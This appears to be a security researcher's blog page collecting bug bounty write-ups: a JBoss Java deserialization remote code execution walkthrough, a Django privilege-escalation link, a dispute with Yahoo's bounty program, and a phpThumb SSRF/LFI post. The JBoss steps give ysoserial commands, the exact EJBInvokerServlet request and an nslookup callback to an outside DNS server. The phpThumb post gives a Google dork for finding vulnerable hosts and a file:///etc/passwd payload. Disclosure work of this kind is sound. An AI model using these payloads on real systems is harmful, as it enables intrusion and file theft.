Privilege Escalation in a Django Application

Attached is the PDF of how I managed to escalate privileges to staff/superuser privileges via a misconfiguration. Django Privilege Escalation – Zero To Superuser

Advertisements
Privilege Escalation in a Django Application

Exploiting Java Deserialization Via JBoss

Background

First off, I would just like to reference the following sites/authors/tools for helping guide me along this route and providing a sweet tool to make this easy:

I ran into a JMXInvokerServlet/EJBInvokerServlet on a private bug bounty. Generally with these, you can just deploy a JSP shell and be done with it. I was running into some issues with this method and I’m not exactly sure why. However, I was still able to get RCE via this version of JBoss (4.2.3) being vulnerable to the Java Deserialization issue. There was egress filtering on this Windows host that didn’t allow me to perform http, ftp, or telnet. I was able to do DNS lookups though which will be shown at the end. I was able to determine it was a windows host due to some file not found-ish error messages.

Steps to Exploit

  1. Grab a copy of ysoserial
  2. Dump your payload into a file:
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘fake.exe’ > serialdata
  3. If you’ll notice, I used ‘fake.exe’ as an example. Originally I was running commands like wget, curl, python, perl, etc. and I would receive some errors in the serialized response, “The system cannot find the file specified.”
  4. To create your POST request for the endpoint use the following headers:
    POST /invoker/EJBInvokerServlet HTTP/1.1
    Host: site.com
    Accept: */*
    Accept-Language: en
    ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Length: 1400
  5. Right click inside the request tab in Repeater and select ‘Paste from file’ and select the file containing serialized data.
    Screen Shot 2016-07-22 at 10.23.28 AM
  6. Response (‘cannot find file’ is present):
    Screen Shot 2016-07-22 at 10.28.40 AM.png
  7. I then decided to try cmd.exe
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘cmd.exe’ > serialdata
  8. Request:
    Screen Shot 2016-07-22 at 10.26.29 AM.png
  9. Response (‘cannot find file’ is not present):
    Screen Shot 2016-07-22 at 10.27.30 AM
  10. From these responses, we can gather that I am able to run cmd.exe. At this point I tried a couple ways of outbound connections; however, I was only able to get DNS lookups to work. Thank you @dawgyg for letting me use your DNS server!
  11. Command:
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘nslookup mealstest.example.com’ > serialtest
  12. External DNS server logs:
    $ sudo tail -f /var/log/messages
    …snip…

    Jul 22 00:10:00 server named[7356]: client 18x.x.x.x#33347: query: mealstest.example.com IN A -EDC (10.0.5.200)

  13. I suspect I might have been able to copy over dnscat line by line then run the code. However I am short on time and the RCE was already proven .
Exploiting Java Deserialization Via JBoss

Getting Hustled by the Yahoo! Bug Bounty Program

Note: I was at one point the top bug reporter for Yahoo! If they do this to me. They are very likely to do this to you.

Yahoo Remote Code Execution CMS

Yahoo Response:

Hey Sean,
Our committee finished reviewing your reports and found that most are not eligible for a bounty under our new rules that were released a month ago, on January 4th. I will be marking all as not eligible and will issue a $500 bounty for the exposed repos and privileges gained from that.
In an additional note, the dev team had found that the SSRF reports were not actually valid. The SQLi and RCE reports were found not to be eligible because they did not demonstrate any privileges that were not already accessible with the cms credentials. Also, the SQLi and RCE reports exhibit behavior that is mentioned as not acceptable in the new rules.

 

I also wanted to ask if you have some time next week (less than 30 mins) to talk a little more about the bug bounty program and to see what types of products/services you may be interested in testing as part of the VIP program.
Thanks,
Andrew
Getting Hustled by the Yahoo! Bug Bounty Program

PhpThumb.php SSRF/LFI

I initially found this issue on a bounty, however it was marked out of scope on a third party provider. It may be possible to turn this into a RCE. Since I had no reason to escalate since no payment. I’ll leave that up to whoever wants to find out.

Google Dork: inurl:/phpThumb/phpThumb.php?src=

Payload: phpThumb.php?src=file:///etc/passwd

fasterh.png

You will see in the response “Unknown image type identified by “root”. It’s reading the /etc/passwd file! However since it only displays the first four characters in the error we can’t read the whole file.

You can also tell it to load remote files http://domain.com/test.php.

 

 

PhpThumb.php SSRF/LFI